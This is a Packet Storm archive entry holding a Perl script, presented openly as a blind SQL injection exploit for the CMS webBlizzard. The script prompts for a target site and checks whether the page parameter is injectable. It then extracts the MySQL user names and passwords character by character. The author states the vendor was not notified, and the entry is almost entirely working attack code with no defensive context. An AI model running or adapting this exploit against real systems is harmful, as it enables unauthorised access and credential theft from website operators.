cmswebblizzard-sql.txt

2008-07-10T00:00:00
ID PACKETSTORM:67982
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2008-07-10T00:00:00

Description

                                        
                                            `#/usr/bin/perl  
  
#|+| Vendor Not Notified  
#|+| Author: Bl@ckbe@rD  
#|+| Discovered On: 10 june 2008  
#|+| greetz: InjEctOrs , underz0ne crew   
#--//-->  
# -- CMS webBlizzard Blind SQL Injection Exploit --  
#--//--> Exploit :  
use strict;  
use LWP::Simple;  
  
print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";  
print "- -\n";  
print "- -\n";  
print "- -\n";  
print "- CMS WebBlizzard Blind SQL Injection exploit -\n";  
print "- -\n";  
print "- -\n";  
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";  
  
print "\nEnter URL (ie: http://site.com): ";  
chomp(my $url=<STDIN>);  
  
if(inject_test($url)) {  
print "Injecting.. Please Wait this could take several minutes..\n\n";  
my $details = blind($url);  
print "Exploit Success! Admin Details: ".$details;  
exit;  
}  
  
sub blind {  
  
my $url = shift;  
my $res = undef;  
my $chr = 48;  
my $substr = 1;  
my $done = 1;  
  
while($done) {  
my $content = get($url."/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM   
mysql.user),".$substr.",1))=".$chr."/*");  
  
if($content =~ /Previous/ && $chr == 94) { $done = 0; }  
elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }  
else { $chr++; }  
}  
return $res;  
}  
  
sub inject_test {  
  
my $url = shift;  
my $true = get($url."/index.php?page=6) and 1=1 /*");  
my $false = get($url."/index.php?page=6) and 1=2 /*");  
  
if($true =~ /Previous/ && $false !~ /Previous/) {  
print "\nTarget Site Vulnerable!\n\n";  
return 1;  
} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }  
}  
`